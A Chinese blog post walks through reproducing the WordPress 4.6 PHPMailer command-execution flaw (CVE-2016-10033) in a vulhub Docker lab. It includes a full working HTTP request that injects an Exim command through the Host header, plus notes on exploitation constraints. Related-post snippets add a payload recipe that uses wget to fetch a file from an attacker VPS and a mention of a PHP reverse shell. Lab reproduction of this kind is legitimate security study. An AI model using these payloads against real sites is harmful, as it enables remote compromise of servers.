vulhub漏洞复现74_Wordpress

最新推荐文章于 2024-04-16 02:10:00 发布
最新推荐文章于 2024-04-16 02:10:00 发布
阅读量1.2k 收藏
点赞数
文章标签: php docker 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122915215
版权

CVE-2016-10033_Wordpress 4.6 任意命令执行漏洞(PwnScriptum)

漏洞原理

参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

测试环境

靶场:192.168.4.10_ubuntu

编译及运行测试环境

#docker-compose build

#docker-compose up -d

由于Mysql初始化需要一段时间,所以请等待。成功运行后,访问`http://your-ip:8080/`打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。

测试与EXP使用

发送如下数据包

```

POST /wp-login.php?action=lostpassword HTTP/1.1

Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

Connection: close

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Accept: */*

Content-Length: 56

Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=root

```

 可见`/tmp/success`已经成功创建:

 

但实际利用起来,还是有一些坑需要踏过。具体的坑有这么几个:

1. 执行的命令不能包含大量特殊字符,如`:`、引号等。

2. 命令会被转换成小写字母

3. 命令需要使用绝对路径

4. 需要知道某一个存在的用户的用户名

漏洞利用

使用msf复现

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1029
简单了解cms,复现vulhub中的wordpress漏洞
omega.0.9.9.zip_Omega_WordPress_WordPress主题_wordpress 主题
09-23
wordpress主题 外型很美观wordpress主题 外型很美观
vulnhub prime之4-wordpress漏洞扫描
逆旅行人的博客
08-09 1073
vulnhub prime wordpress渗透
【打靶记录】VulnHub-stapler靶机渗透wp(1),成功跳槽百度工资从15K涨到28K
最新发布
2401_83974256的博客
04-16 890
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。cp /usr/share/webshells/php/php-reverse-shell.php . //下载php木马到本地。这是一种非常开放的权限设置,需要谨慎使用。
vulhubWordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)
weixin_42884199的博客
12-06 367
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
vulhubWordpress 4.6 pwnscriptum 任意命令执行漏洞
qq_45300786的博客
04-16 1041
访问地址:http://your-ip:8080/wp-login.php 这里我就简单说下需要特别注意的地方。 1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替 2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替 Payload,在tmp处添加success文件 aa(any -froot@localhost -be ${run{/bin/touch /tmp/success
Vulnhub靶场渗透测试系列DC-6(WordPress的activity monitor插件漏洞)
qq_45722813的博客
12-07 761
Vulnhub靶场渗透测试系列DC-6 下载地址:https://www.vulnhub.com/entry/dc-6,315/ 将下载好的靶机导入到VMware中,修改网络模式为NAT模式,开启靶机虚拟机 在kali机使用命令nmap -Pn 192.168.172.1/24主机发现,获取靶机IP地址 ...
wordpress-mu.rar_wordpress mu
09-24
WordPress MU 2.6 正式版已经放出。WordPress MU 是一款著名的多用户版 Blog 程序。其核心代码使用了全世界最优秀的 Blog 程序 —— WordPress。因此,其丰富的功能和稳定的性能,可见一斑
yith.zip_wordpress themes_zip
09-23
wordpress premium theme
wordpress-zh_cn.zip_V2 _WPCN_WordPress
09-23
WordPress v2.3.1 简体中文语言包第一版(wpcn)
Wordpress 4.6 任意命令执行漏洞
weixin_44248882的博客
07-02 323
Wordpress 4.6 任意命令执行漏洞 Wordpress 4.6 任意命令执行漏洞(PwnScriptum) 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞环境 我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可 git clone git://github.co
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1086
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2746
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6233
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 1352
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
vulhubWordpress 4.6 任意命令执行漏洞复现
yougexiaojiuguan的博客
03-04 803
漏洞复现的记录
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 596
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞
wpvuldemo漏洞复现
09-09
复现漏洞,首先需要在本地搭建一个WordPress网站。 1. 安装环境:需要在本地环境中设置好PHP、MySQL和Web服务器(如Apache)。 2. 下载WordPress:前往WordPress官方网站,下载最新版本的WordPress。 3. 解压...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值